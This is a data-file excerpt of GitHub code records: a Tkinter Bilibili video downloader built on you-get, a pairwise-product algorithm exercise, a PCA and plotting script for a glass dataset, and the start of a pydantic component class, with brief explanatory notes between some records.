entry5.get()\r\n        dirctory1 = entry6.get()\r\n        difinition1 = select_download1.get()\r\n        difinit1 = '--format=' + difinition1\r\n        window.update()\r\n        try:\r\n            window.update()\r\n            listbox2.insert(\"end\", \"正在下载..........\")\r\n            window.update()\r\n            cmd3 = f'you-get -o {dirctory1} --playlist {difinit1} {urls}'\r\n            window.update()\r\n            p = sub.Popen(cmd3, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n            for line in iter(p.stdout.readline, b''):\r\n                listbox2.insert('end', line.decode('UTF-8'))\r\n                if sub.Popen.poll(p) is not None:\r\n                    if line == \"\":\r\n                        break\r\n            p.stdout.close()\r\n            listbox2.insert('end', \"下载成功\")\r\n        except Exception as e:\r\n            listbox2.insert(\"end\", \"错误提醒:\")\r\n            listbox2.insert('end', e)\r\n            listbox2.insert('end', '下载失败')\r\n\r\n    def state():\r\n        button1.config(state='normal')\r\n\r\n    def clear0():\r\n        entry1.delete(0, 'end')\r\n\r\n    def clear1():\r\n        entry2.delete(0, 'end')\r\n\r\n    def clear2():\r\n        entry5.delete(0, 'end')\r\n\r\n    def clear3():\r\n        entry6.delete(0, 'end')\r\n\r\n    def clear4():\r\n        entry3.delete(0, 'end')\r\n\r\n    def clear5():\r\n        entry4.delete(0, 'end')\r\n\r\n    label1 = ttk.Label(frame3, text=\"\t下载网址:\", font=(\"华文行楷\", 13), foreground='black', anchor='e',\r\n                       justify='right', takefocus=True)\r\n    url = tk.StringVar()\r\n    entry1 = ttk.Entry(frame3, textvariable=url, font=(\"华文新魏\", 13, 'bold'), foreground='black',\r\n                       takefocus=True,\r\n                       width=36)\r\n    button1 = ttk.Button(frame4, text=\"确认下载\", state='disabled', command=lambda: thread_it(download))\r\n    label2 = ttk.Label(frame3, text=\" 选择下载地址:\", font=(\"华文行楷\", 13), foreground=\"black\",\r\n                       anchor=\"e\", justify='right')\r\n    address = tk.StringVar()\r\n    entry2 = ttk.Entry(frame3, textvariable=address, font=(\"华文新魏\", 13, 'bold'), width=36)\r\n    button2 = ttk.Button(frame3, text=\"选 择\", command=lambda: thread_it(select_address))\r\n    label3 = ttk.Label(frame3, text=\" 选择清晰度:\", font=(\"华文行楷\", 13), foreground='black',\r\n                       anchor='e', justify='right')\r\n    select_download = tk.StringVar()\r\n    style = ttk.Style()\r\n    style.configure(\"TRadiobutton\", font=(\"华文新魏\", 12, 'bold'))\r\n    radiobutton1 = ttk.Radiobutton(frame4, text=\"dash-flv\", value='dash-flv', variable=select_download,\r\n                                   command=lambda: thread_it(state), takefocus=False)\r\n    radiobutton2 = ttk.Radiobutton(frame4, text='dash-flv720', value='dash-flv720',\r\n                                   variable=select_download, command=lambda: thread_it(state), takefocus=False)\r\n    radiobutton3 = ttk.Radiobutton(frame4, text='dash-flv480', value='dash-flv480',\r\n                                   variable=select_download, command=lambda: thread_it(state),\r\n                                   takefocus=False)\r\n    radiobutton4 = ttk.Radiobutton(frame4, text='dash-flv360', value='dash-flv360',\r\n                                   variable=select_download, command=lambda: thread_it(state),\r\n                                   takefocus=False)\r\n    radiobutton5 = ttk.Radiobutton(frame4, text=\"flv\", value='flv', variable=select_download,\r\n                                   command=lambda: thread_it(state), takefocus=False)\r\n    radiobutton6 = ttk.Radiobutton(frame4, text='flv720', value='flv720', variable=select_download,\r\n                                   command=lambda: thread_it(state), takefocus=False)\r\n    radiobutton7 = ttk.Radiobutton(frame4, text='flv480', value='flv480', variable=select_download,\r\n                                   command=lambda: thread_it(state), takefocus=False)\r\n    radiobutton8 = ttk.Radiobutton(frame4, text='flv360', value='flv360', variable=select_download,\r\n                                   command=lambda: thread_it(state), takefocus=False)\r\n    but1 = ttk.Button(frame4, text=\"网址清空\", command=clear0)\r\n    but2 = ttk.Button(frame4, text='地址清空', command=clear1)\r\n    but3 = ttk.Button(frame4, text='退出程序', command=window.quit)\r\n    xscrollbar = tk.Scrollbar(frame5, orient='horizontal')\r\n    yscrollbar = tk.Scrollbar(frame5, orient='vertical')\r\n    listbox = tk.Listbox(frame5, font=(\"华文新魏\", 13, 'bold'), xscrollcommand=xscrollbar.set,\r\n                         yscrollcommand=yscrollbar.set, width=500, height=500)\r\n    xscrollbar.config(command=listbox.xview)\r\n    yscrollbar.config(command=listbox.yview)\r\n    listbox.insert(\"0\", '软件说明:')\r\n    listbox.insert('end', '首先输入下载网址')\r\n    listbox.insert('end', \"选择视频保存路径或者输入一个路径\")\r\n    listbox.insert('end', '再查看视频的清晰度')\r\n    listbox.insert('end', '选择清晰度')\r\n    listbox.insert('end', '选择清晰度后下载视频')\r\n    listbox.insert('end', '提醒(只有选择清晰度后下载按钮才开启正常状态)')\r\n\r\n    label1.grid(row=0, column=0, padx=10, pady=5)\r\n    entry1.grid(row=0, column=1, padx=10, pady=5)\r\n    button1.grid(row=2, column=2, padx=10, pady=5)\r\n    label2.grid(row=1, column=0, padx=10, pady=5)\r\n    entry2.grid(row=1, column=1, padx=10, pady=5)\r\n    button2.grid(row=1, column=2, padx=10, pady=5)\r\n    label3.grid(row=2, column=0, sticky='w', padx=10, pady=5)\r\n    radiobutton1.grid(row=0, column=0, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton2.grid(row=0, column=1, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton3.grid(row=0, column=2, padx=25, pady=5, sticky=\"e\")\r\n    radiobutton4.grid(row=0, column=3, padx=25, pady=5, sticky=\"e\")\r\n    radiobutton5.grid(row=1, column=0, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton6.grid(row=1, column=1, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton7.grid(row=1, column=2, padx=65, pady=5, sticky=\"e\")\r\n    radiobutton8.grid(row=1, column=3, padx=65, pady=5, sticky=\"e\")\r\n    but1.grid(row=2, column=0, sticky='w')\r\n    but2.grid(row=2, column=1)\r\n    but3.grid(row=2, column=3)\r\n    xscrollbar.pack(side='bottom', fill='x', expand=True)\r\n    yscrollbar.pack(side='right', fill='y', expand=True)\r\n    listbox.pack(fill='both', expand=True)\r\n\r\n    currentpage = frame1\r\n    currentpage.pack()\r\n    # Page two\r\n    frame2 = tk.Frame(window)\r\n    # frame2.pack_propagate(False)\r\n    frame6 = tk.Frame(frame2, relief='sunken')\r\n    frame7 = tk.Frame(frame2, relief='sunken')\r\n    frame8 = tk.Frame(frame2, relief='sunken')\r\n    frame14 = tk.Frame(frame2, relief='sunken')\r\n    # frame layout\r\n    frame6.pack()\r\n    frame7.pack()\r\n    frame14.pack()\r\n    frame8.pack()\r\n    # widgets\r\n    label4 = ttk.Label(frame6, text=\"视频路径:\", font=(\"华文行楷\", 13))\r\n    way = tk.StringVar()\r\n    entry3 = ttk.Entry(frame6, textvariable=way, font=(\"华文新魏\", 12, 'bold'), width=36, exportselection=True)\r\n    style0 = ttk.Style()\r\n    style0.configure(\"TButton\", font=(\"华文行楷\", 13))\r\n    button3 = ttk.Button(frame6, text='选 择', command=lambda: thread_it2(select_way))\r\n    label5 = ttk.Label(frame6, text=\"转换格式:\", font=(\"华文行楷\", 13))\r\n    layout = tk.StringVar()\r\n    style1 = ttk.Style()\r\n    style1.configure(\"TRadiobutton\", font=(\"华文新魏\", 12, 'bold'))\r\n    radiobutton9 = ttk.Radiobutton(frame6, text=\"mp4\", value=\"mp4\", variable=layout, takefocus=False)\r\n    radiobutton10 = ttk.Radiobutton(frame6, text=\"flv\", value=\"flv\", variable=layout, takefocus=False)\r\n    radiobutton11 = ttk.Radiobutton(frame6, text=\"avi\", value=\"avi\", variable=layout, takefocus=False)\r\n    radiobutton12 = ttk.Radiobutton(frame6, text=\"mov\", value=\"mov\", variable=layout, takefocus=False)\r\n    label6 = ttk.Label(frame7, text=\"保存地址:\", font=(\"华文行楷\", 13))\r\n    saveway = tk.StringVar()\r\n    entry4 = ttk.Entry(frame7, textvariable=saveway, font=(\"华文新魏\", 12, 'bold'), width=36, exportselection=True)\r\n    button4 = ttk.Button(frame7, text=\"选择路径\", command=lambda: thread_it2(selection_address))\r\n    button5 = ttk.Button(frame14, text='路径清空', command=lambda: thread_it2(clear4))\r\n    button6 = ttk.Button(frame14, text='地址清空', command=lambda: thread_it2(clear5))\r\n    button7 = ttk.Button(frame14, text=\"开始转换\", command=lambda: thread_it2(conversion))\r\n    button8 = ttk.Button(frame14, text='退出程序', command=lambda: thread_it2(window.quit))\r\n    xscrollbar1 = ttk.Scrollbar(frame8, orient='horizontal')\r\n    yscrollbar1 = ttk.Scrollbar(frame8, orient='vertical')\r\n    listbox1 = tk.Listbox(frame8, relief=\"sunken\", font=(\"华文新魏\", 12, 'bold'), takefocus=True,\r\n                          xscrollcommand=xscrollbar1.set, yscrollcommand=yscrollbar1.set, width=500, height=500)\r\n    xscrollbar1.configure(command=listbox1.xview)\r\n    yscrollbar1.configure(command=listbox1.yview)\r\n    # widget layout\r\n    label4.grid(row=0, column=0, padx=10, pady=5)\r\n    entry3.grid(row=0, column=1, padx=10, pady=5)\r\n    button3.grid(row=0, column=2, padx=10, pady=5)\r\n    label5.grid(row=1, column=0, padx=10, pady=5)\r\n    radiobutton9.grid(row=2, column=0, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton10.grid(row=2, column=1, padx=25, pady=5, sticky=\"e\")\r\n    radiobutton11.grid(row=3, column=0, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton12.grid(row=3, column=1, padx=10, pady=5, sticky=\"e\")\r\n    label6.grid(row=0, column=0, padx=10, pady=5)\r\n    entry4.grid(row=0, column=1, padx=10, pady=5)\r\n    button4.grid(row=0, column=2, padx=10, pady=5)\r\n    button5.grid(row=0, column=0, padx=10, sticky='w')\r\n    button6.grid(row=0, column=1, padx=10, sticky='w')\r\n    button7.grid(row=0, column=2, padx=10)\r\n    button8.grid(row=0, column=3, padx=10)\r\n    xscrollbar1.pack(side='bottom', fill='x', expand=True)\r\n    yscrollbar1.pack(side='right', fill='y', expand=True)\r\n    listbox1.pack(fill='both', expand=True)\r\n\r\n    # Page three\r\n    frame9 = tk.Frame(window)\r\n    frame10 = tk.Frame(frame9, relief='sunken')\r\n    frame11 = tk.Frame(frame9, relief='sunken')\r\n    frame12 = tk.Frame(frame9, relief='sunken')\r\n    frame13 = tk.Frame(frame9, relief='sunken')\r\n    # frame layout\r\n    frame10.pack()\r\n    frame11.pack()\r\n    frame12.pack()\r\n    frame13.pack()\r\n    # widgets\r\n    address1 = tk.StringVar()\r\n    label7 = ttk.Label(frame10, text='下载网址:', font=(\"华文行楷\", 13), foreground='black', anchor='e')\r\n    entry5 = ttk.Entry(frame10, textvariable=address1, font=(\"华文新魏\", 13, 'bold'), foreground='black', justify='left',\r\n                       exportselection=True, takefocus=True, width=36)\r\n    label8 = ttk.Label(frame10, text=\"保存地址:\", font=(\"华文行楷\", 13), foreground='black', anchor='e')\r\n    button7 = ttk.Button(frame10, text=\"选 择\", command=lambda: thread_it1(select_address1))\r\n    address2 = tk.StringVar()\r\n    entry6 = ttk.Entry(frame10, textvariable=address2, font=(\"华文新魏\", 13, 'bold'), foreground='black', justify='left',\r\n                       exportselection=True, takefocus=True, width=36)\r\n    label9 = ttk.Label(frame10, text=\" 选择清晰度:\", font=(\"华文行楷\", 13), foreground='black',\r\n                       anchor='e', justify='right')\r\n    select_download1 = tk.StringVar()\r\n    style = ttk.Style()\r\n    style.configure(\"TRadiobutton\", font=(\"华文新魏\", 12, 'bold'))\r\n    radiobutton13 = ttk.Radiobutton(frame11, text=\"dash-flv\", value='dash-flv', variable=select_download1,\r\n                                    takefocus=False)\r\n    radiobutton14 = ttk.Radiobutton(frame11, text='dash-flv720', value='dash-flv720',\r\n                                    variable=select_download1, takefocus=False)\r\n    radiobutton15 = ttk.Radiobutton(frame11, text='dash-flv480', value='dash-flv480',\r\n                                    variable=select_download1,\r\n                                    takefocus=False)\r\n    radiobutton16 = ttk.Radiobutton(frame11, text='dash-flv360', value='dash-flv360',\r\n                                    variable=select_download1,\r\n                                    takefocus=False)\r\n    radiobutton17 = ttk.Radiobutton(frame11, text=\"flv\", value='flv', variable=select_download1,\r\n                                    takefocus=False)\r\n    radiobutton18 = ttk.Radiobutton(frame11, text='flv720', value='flv720', variable=select_download1,\r\n                                    takefocus=False)\r\n    radiobutton19 = ttk.Radiobutton(frame11, text='flv480', value='flv480', variable=select_download1,\r\n                                    takefocus=False)\r\n    radiobutton20 = ttk.Radiobutton(frame11, text='flv360', value='flv360', variable=select_download1,\r\n                                    takefocus=False)\r\n\r\n    button8 = ttk.Button(frame12, text='网址清空', command=lambda: thread_it1(clear2))\r\n    button9 = ttk.Button(frame12, text='地址清空', command=lambda: thread_it1(clear3))\r\n    button10 = ttk.Button(frame12, text=\"确认下载\", command=lambda: thread_it1(download1))\r\n    button11 = ttk.Button(frame12, text=\"退出程序\", command=lambda: thread_it1(window.quit))\r\n    xscrollbar = tk.Scrollbar(frame13, orient='horizontal')\r\n    yscrollbar = tk.Scrollbar(frame13, orient='vertical')\r\n    listbox2 = tk.Listbox(frame13, font=(\"华文新魏\", 13, 'bold'), xscrollcommand=xscrollbar.set,\r\n                          yscrollcommand=yscrollbar.set, width=500, height=500)\r\n    xscrollbar.config(command=listbox2.xview)\r\n    yscrollbar.config(command=listbox2.yview)\r\n    # widget layout\r\n    label7.grid(row=0, column=0, padx=10, pady=5)\r\n    entry5.grid(row=0, column=1, padx=10, pady=5)\r\n    label8.grid(row=1, column=0, padx=10, pady=5)\r\n    entry6.grid(row=1, column=1, padx=10, pady=5)\r\n    button7.grid(row=1, column=2, padx=10, pady=5)\r\n    label9.grid(row=2, column=0, sticky='w', padx=10, pady=5)\r\n    radiobutton13.grid(row=0, column=0, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton14.grid(row=0, column=1, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton15.grid(row=0, column=2, padx=25, pady=5, sticky=\"e\")\r\n    radiobutton16.grid(row=0, column=3, padx=25, pady=5, sticky=\"e\")\r\n    radiobutton17.grid(row=1, column=0, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton18.grid(row=1, column=1, padx=25, pady=5, sticky=\"w\")\r\n    radiobutton19.grid(row=1, column=2, padx=65, pady=5, sticky=\"e\")\r\n    radiobutton20.grid(row=1, column=3, padx=65, pady=5, sticky=\"e\")\r\n    button8.grid(row=0, column=0, padx=40)\r\n    button9.grid(row=0, column=1, padx=40)\r\n    button10.grid(row=0, column=2, padx=40)\r\n    button11.grid(row=0, column=3, padx=40)\r\n    xscrollbar.pack(side='bottom', fill='x', expand=True)\r\n    yscrollbar.pack(side='right', fill='y', expand=True)\r\n    listbox2.pack(fill='both', expand=True)\r\n\r\n\r\n# Create the window\r\nwindow = tk.Tk()\r\nsw = window.winfo_screenwidth()\r\nsh = window.winfo_screenheight()\r\nw = 700\r\nh = 500\r\nwindow.geometry(\"{0}x{1}+{2}+{3}\".format(w, h, int((sw - w) / 2), int((sh - h) / 2)))\r\nwindow.title(\"哔哩视频下载器\")\r\nwindow.resizable(True, True)\r\nwindow.update()\r\n\r\n\r\n# Button frame\r\nframe0 = tk.Frame(window, height=30, width=500)\r\nframe0.pack(side='top', fill='both', expand=1)\r\n\r\n# Page-switching buttons\r\nbtn = tk.StringVar()\r\nbtn1 = ttk.Button(frame0, text='视频下载', command=firstpage)\r\nbtn1.pack(side=\"left\")\r\n\r\nbtn2 = ttk.Button(frame0, text='批量下载', command=threepage)\r\nbtn2.pack(side='left', expand=True)\r\n\r\nbtn3 = ttk.Button(frame0, text='格式转换', command=secondpage)\r\nbtn3.pack(side='right')\r\n\r\n# Open the main page first\r\nif __name__ == \"__main__\":\r\n    global frame1, frame2, frame9, currentpage\r\n    create_frame()\r\n    window.mainloop()\r\n","repo_name":"LiYou487341754/li8023family","sub_path":"哔哩视频下载器.py","file_name":"哔哩视频下载器.py","file_ext":"py","file_size_in_byte":22953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
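A standalone sketch of the subprocess streaming pattern the downloader uses: read the child's stdout line by line (so the listbox can update as you-get prints progress) rather than blocking on communicate(). The echo command is just a placeholder:

import subprocess as sub

p = sub.Popen('echo one && echo two', stdout=sub.PIPE, shell=True)
for line in iter(p.stdout.readline, b''):  # b'' marks end of stream
    print(line.decode().rstrip())
p.stdout.close()
p.wait()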
+{"seq_id":"6265130153","text":"#Order of growth: O(n^2)\n#Why? Because there are two nested loops, each of which is O(n)\ndef max_pairwise_product(numbers):\n n = len(numbers)\n max_product = 0\n for first in range(n):\n for second in range(first + 1, n):\n max_product = max(max_product,\n numbers[first] * numbers[second])\n\n return max_product\n\n#Order of growth: O(n)\n#Why? Because the max function is O(n) and the remove function is O(n)\ndef my_max_pairwise_product(numbers):\n # find the largest number in numbers\n max1 = max(numbers)\n # find the next largest number in numbers \n # by removing the largest number from numbers\n numbers.remove(max1)\n max2 = max(numbers)\n return max1 * max2 \n\n\n\nif __name__ == '__main__':\n input_n = int(input())\n input_numbers = [int(x) for x in input().split()]\n print(my_max_pairwise_product(input_numbers))\n\n","repo_name":"ethanqtle/UCSD_Algorithms_1","sub_path":"week1_programming_challenges/2_maximum_pairwise_product/max_pairwise_product.py","file_name":"max_pairwise_product.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
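Note that my_max_pairwise_product above mutates its input via remove(). A sketch of the same O(n) answer in a single pass, without side effects, tracking the two largest values as it goes:

def two_largest_product(numbers):
    max1 = max2 = float('-inf')
    for x in numbers:
        if x > max1:
            max1, max2 = x, max1  # new largest; old largest becomes runner-up
        elif x > max2:
            max2 = x
    return max1 * max2

print(two_largest_product([1, 2, 3]))  # 6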
+{"seq_id":"35720350556","text":" # -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 2 10:36:35 2017\n\n@author: rajaz\n\"\"\"\n\n# exercise 2.1.1\nimport os\nimport numpy as np\nimport xlrd\n\n# Load xls sheet with data\nos.chdir(\"C:\\\\Users\\\\rajaz\\\\OneDrive\\\\Documents\\\\Machine\\\\project_data\\\\\")\ndoc = xlrd.open_workbook(\".\\\\glass_data.xls\").sheet_by_index(0)\n\n# Extract attribute names (1st row, column 4 to 12)\nattributeNames = doc.row_values(0, 1, 10)\n\n# Extract class names to python list,\n# then encode with integers (dict)\nclassLabels = doc.col_values(10, 1, 214)\nclassNames = sorted(set(classLabels))\nclassDict = dict(zip(classNames, range(6)))\n\n# Extract vector y, convert to NumPy matrix and transpose\ny = np.array([classDict[value] for value in classLabels])\n\n# Preallocate memory, then extract excel data to matrix X\nX = np.mat(np.empty((213, 9)))\nfor i, col_id in enumerate(range(1, 10)):\n X[:, i] = np.mat(doc.col_values(col_id, 1, 214)).T\n\n# Compute values of N, M and C.\nN = len(y)\nM = len(attributeNames)\nC = len(classNames)\n\n# exercise 2.1.2\n\nfrom matplotlib.pyplot import figure, plot, title, legend, xlabel, ylabel, show\n\n# Data attributes to be plotted\ni = 0\nj = 1\n\n##\n# Make a simple plot of the i'th attribute against the j'th attribute\n# Notice that X is of matrix type (but it will also work with a numpy array)\n# X = np.array(X) #Try to uncomment this line\nplot(X[:, i], X[:, j], 'o')\n\n# %%\n# Make another more fancy plot that includes legend, class labels, \n# attribute names, and a title.\nf = figure()\nf.hold()\ntitle('NanoNose data')\n\nfor c in range(C):\n # select indices belonging to class c:\n class_mask = y.ravel()==c\n plot(X[class_mask,i], X[class_mask,j], 'o')\n\nlegend(classNames)\nxlabel(attributeNames[i])\nylabel(attributeNames[j])\n\n# Output result to screen\nshow()\n\n# exercise 2.1.3\n\nfrom matplotlib.pyplot import figure, plot, title, xlabel, ylabel, show\nfrom scipy.linalg import svd\n\n# Subtract mean value from data\nY = X - np.ones((N,1))*X.mean(0)\n\n# PCA by computing SVD of Y\nU,S,V = svd(Y,full_matrices=False)\n\n# Compute variance explained by principal components\nrho = (S*S) / (S*S).sum() \n\n# Plot variance explained\nfigure()\nplot(range(1,len(rho)+1),rho,'o-')\ntitle('Variance explained by principal components');\nxlabel('Principal component');\nylabel('Variance explained');\nshow()\n\n# exercise 2.1.4\n\n\nfrom matplotlib.pyplot import figure, plot, title, xlabel, ylabel, show, legend\nfrom scipy.linalg import svd\n\n# Subtract mean value from data\nY = X - np.ones((N,1))*X.mean(0)\n\n# PCA by computing SVD of Y\nU,S,V = svd(Y,full_matrices=False)\nV = V.T\n# Project the centered data onto principal component space\nZ = Y * V\n\n\n# Indices of the principal components to be plotted\ni = 0\nj = 1\n\n# Plot PCA of the data\nf = figure()\nf.hold()\ntitle('NanoNose data: PCA')\n#Z = array(Z)\nfor c in range(C):\n # select indices belonging to class c:\n class_mask = y.ravel()==c\n plot(Z[class_mask,i], Z[class_mask,j], 'o')\nlegend(classNames)\nxlabel('PC{0}'.format(i+1))\nylabel('PC{0}'.format(j+1))\n\n# Output result to screen\nshow()\n\n\nfrom scipy.linalg import svd\n\n# (requires data structures from ex. 2.2.1 and 2.2.3)\nY = X - np.ones((N,1))*X.mean(0)\nU,S,V = svd(Y,full_matrices=False)\nV=V.T\n\n\nprint(V[:,1].T)\n## Projection of water class onto the 2nd principal component.\n# Note Y is a numpy matrix, while V is a numpy array. 
\n\n# Either convert V to a numpy.mat and use * (matrix multiplication)\nprint((Y[y.ravel()==4,:] * np.mat(V[:,1]).T).T)\n\n# Or interpret Y as a numpy.array and use @ (matrix multiplication for np.array)\n#print( (np.asarray(Y[y.A.ravel()==4,:]) @ V[:,1]).T )\n\nfrom matplotlib.pyplot import figure, subplot, hist, hold, xlabel, ylim, show, xticks, boxplot, yticks\nimport numpy as np\n\nfigure(figsize=(8,7))\nu = np.floor(np.sqrt(M)); v = np.ceil(float(M)/u)\nfor i in range(M):\n subplot(u,v,i+1)\n hist(X[:,i])\n xlabel(attributeNames[i])\n ylim(0,N/2)\n \nshow()\n\n\nfigure(figsize=(12,10))\nhold(True)\nfor m1 in range(M):\n for m2 in range(M):\n subplot(M, M, m1*M + m2 + 1)\n for c in range(C):\n class_mask = (y==c)\n plot(np.array(X[class_mask,m2]), np.array(X[class_mask,m1]), '.')\n if m1==M-1:\n xlabel(attributeNames[m2])\n else:\n xticks([])\n if m2==0:\n ylabel(attributeNames[m1])\n else:\n yticks([])\n #ylim(0,X.max()*1.1)\n #xlim(0,X.max()*1.1)\nlegend(classNames)\n\nshow()\n\n\nboxplot(X)\nxticks(range(9),attributeNames)\nylabel('')\ntitle('Glass Data - boxplot')\nshow()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,0]\nmeasurements0 = np.asarray(L)\nmeasurements0 = np.squeeze(measurements0)\nstats.probplot(measurements0, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,1]\nmeasurements1 = np.asarray(L)\nmeasurements1 = np.squeeze(measurements1)\nstats.probplot(measurements1, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,2]\nmeasurements2 = np.asarray(L)\nmeasurements2 = np.squeeze(measurements2)\nstats.probplot(measurements2, dist=\"norm\", plot=pylab)\npylab.show()\n\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,3]\nmeasurements3 = np.asarray(L)\nmeasurements3 = np.squeeze(measurements3)\nstats.probplot(measurements3, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,4]\nmeasurements4 = np.asarray(L)\nmeasurements4 = np.squeeze(measurements4)\nstats.probplot(measurements4, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,5]\nmeasurements5 = np.asarray(L)\nmeasurements5 = np.squeeze(measurements5)\nstats.probplot(measurements5, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,6]\nmeasurements6 = np.asarray(L)\nmeasurements6 = np.squeeze(measurements6)\nstats.probplot(measurements6, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,7]\nmeasurements7 = np.asarray(L)\nmeasurements7 = np.squeeze(measurements7)\nstats.probplot(measurements7, dist=\"norm\", plot=pylab)\npylab.show()\n\nimport numpy as np \nimport pylab \nimport scipy.stats as stats\nL = X[:,8]\nmeasurements8 = np.asarray(L)\nmeasurements8 = np.squeeze(measurements8)\nstats.probplot(measurements8, dist=\"norm\", plot=pylab)\npylab.show()\n\n# VIRKER!!!!\nfigure(figsize=(14,10))\nfor c in range(C):\n subplot(2,C/2,c+1)\n class_mask = (y==c) # binary mask to extract elements of class c\n #class_mask = nonzero(y==c)[0].tolist()[0] # indices of class c\n \n boxplot(X[class_mask,:])\n title('Class: {0}'.format(classNames[c]))\n xticks(range(1,len(attributeNames)+1), [a[:7] for a in attributeNames], rotation=45)\n y_up = X.max()+(X.max()-X.min())*0.1; y_down = 
X.min()-(X.max()-X.min())*0.1\n    ylim(y_down, y_up)\n\nshow()\nboxplot(X[class_mask,:])\n\nfrom matplotlib.pyplot import (figure, hold, subplot, plot, xlabel, ylabel, \n                               xticks, yticks,legend,show,imshow,colorbar)\n \nfigure(figsize=(12,10))\nhold(True)\nfor m1 in range(M):\n    for m2 in range(M):\n        subplot(M, M, m1*M + m2 + 1)\n        for c in range(C):\n            class_mask = (y==c)\n            plot(np.array(X[class_mask,m2]), np.array(X[class_mask,m1]), '.')\n        if m1==M-1:\n            xlabel(attributeNames[m2])\n        else:\n            xticks([])\n        if m2==0:\n            ylabel(attributeNames[m1])\n        else:\n            yticks([])\n        #ylim(0,X.max()*1.1)\n        #xlim(0,X.max()*1.1)\nlegend(classNames)\n\nshow()\n\n\nfrom matplotlib.pyplot import (figure, show, hold)\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n# Indices of the variables to plot\n\nf = figure()\nhold('True')\nind = [0, 1, 2]\n\ncolors = ['blue', 'green', 'red']\n\nax = f.add_subplot(111, projection='3d') #Here the mpl_toolkits is used\nfor c in range(C):\n    class_mask = (y==c)\n    s = ax.scatter(X[class_mask,ind[0]], X[class_mask,ind[1]], X[class_mask,ind[2]])\n\nax.view_init(30, 220)\nax.set_xlabel(attributeNames[ind[0]])\nax.set_ylabel(attributeNames[ind[1]])\nax.set_zlabel(attributeNames[ind[2]])\nshow()\n\n\nfrom scipy.stats import zscore\nfrom matplotlib import cm\n\nX_standardized = zscore(X, ddof=1)\n\nfigure()\nimshow(X_standardized, interpolation='none', aspect=(4./N), cmap=cm.gray);\nxticks(range(9), attributeNames)\nxlabel('Attributes')\nylabel('Data objects')\ntitle('Glass data matrix')\ncolorbar()\n\nshow()\n\n# standard\nfigure(figsize=(12,6))\ntitle('Glass: Boxplot (standardized)')\nboxplot(zscore(X, ddof=1), attributeNames)\nxticks(range(1,M+1), attributeNames, rotation=45)\n\n\n#Some attributes, maybe if we can see some correlation. \n\n\nAttributes = [1,4,5,6]\nNumAtr = len(Attributes)\n\nfigure(figsize=(12,12))\nhold(True)\n\nfor m1 in range(NumAtr):\n    for m2 in range(NumAtr):\n        subplot(NumAtr, NumAtr, m1*NumAtr + m2 + 1)\n        for c in range(C):\n            class_mask = (y==c)\n            plot(X[class_mask,Attributes[m2]], X[class_mask,Attributes[m1]], '.')\n        if m1==NumAtr-1:\n            xlabel(attributeNames[Attributes[m2]])\n        else:\n            xticks([])\n        if m2==0:\n            ylabel(attributeNames[Attributes[m1]])\n        else:\n            yticks([])\n        #ylim(0,X.max()*1.1)\n        #xlim(0,X.max()*1.1)\nlegend(classNames)\nshow()\n\n\n\n","repo_name":"Rajashan/DTU-ML_intro","sub_path":"project1_code.py","file_name":"project1_code.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
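A compact sketch of the PCA-by-SVD recipe the script above repeats several times: center the data, factor it, and read the explained variance off the squared singular values. Random data stands in for X:

import numpy as np
from scipy.linalg import svd

X = np.random.rand(50, 4)
Y = X - X.mean(axis=0)          # center each column
U, S, V = svd(Y, full_matrices=False)
rho = (S * S) / (S * S).sum()   # variance explained per component
print(rho.sum())                # ~1.0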
+{"seq_id":"21377531406","text":"import csv\nimport json\nfrom typing import ClassVar, Dict, Optional, Tuple, Union\n\nfrom pydantic import BaseModel, Field, root_validator, validator\n\nfrom symbench_athens_client.utils import (\n get_data_file_path,\n inject_none_for_missing_fields_and_nans,\n)\n\n\nclass Component(BaseModel):\n \"\"\"The Base Component Class\"\"\"\n\n __swap_aliases__: ClassVar[Dict[str, str]] = {}\n\n name: str = Field(\n ...,\n description=\"The name of the component as is in the graph database\",\n alias=\"Name\",\n )\n\n model: str = Field(..., description=\"Model name of the Component\", alias=\"MODEL\")\n\n classification: str = Field(\n \"Battery\",\n description=\"The component type for this battery. Redundant but useful info\",\n alias=\"Classification\",\n )\n\n corpus: str = Field(\n ..., description=\"The corpus for which this element belongs to\", alias=\"Corpus\"\n )\n\n @property\n def prt_file(self) -> Optional[str]:\n return None\n\n def __repr__(self):\n return f\"<{self.__class__.__name__}, Category: {self.classification}, Name: {self.name}>\"\n\n def __str__(self):\n return repr(self)\n\n def dict(\n self,\n *,\n include: Union[\"AbstractSetIntStr\", \"MappingIntStrAny\"] = None,\n exclude: Union[\"AbstractSetIntStr\", \"MappingIntStrAny\"] = None,\n by_alias: bool = False,\n skip_defaults: bool = None,\n exclude_unset: bool = False,\n exclude_defaults: bool = False,\n exclude_none: bool = False,\n ) -> \"DictStrAny\":\n comp_dict = super().dict(\n include=include,\n exclude=exclude,\n by_alias=by_alias,\n 